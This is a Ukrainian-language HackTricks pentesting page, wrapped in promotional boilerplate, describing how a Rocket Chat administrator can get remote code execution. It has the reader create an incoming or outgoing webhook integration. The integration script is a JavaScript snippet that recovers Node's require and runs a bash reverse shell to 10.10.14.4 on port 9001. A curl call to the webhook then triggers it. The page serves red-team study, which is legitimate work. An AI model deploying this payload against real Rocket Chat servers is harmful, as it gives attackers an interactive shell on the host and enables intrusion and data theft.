Rocket Chat

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію в рекламі на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.

RCE

Якщо ви адміністратор в Rocket Chat, ви можете отримати RCE.

Перейдіть до Інтеграції та виберіть Нова інтеграція та оберіть будь-яку: Вхідний веб-запит або Вихідний веб-запит.
/admin/integrations/incoming

Згідно з документацією, обидва використовують ES2015 / ECMAScript 6 (по суті JavaScript) для обробки даних. Тож давайте отримаємо rev shell для javascript як:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Налаштуйте веб-гачок (канал та публікація як користувач повинні існувати):

Налаштуйте сценарій веб-гачка:

Збережіть зміни
Отримайте згенерований URL веб-гачка:

Викличте його за допомогою curl, і ви повинні отримати обернену оболонку

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.

4.8 KiB Raw Blame History Unescape Escape

Rocket Chat

RCE

4.8 KiB

Raw Blame History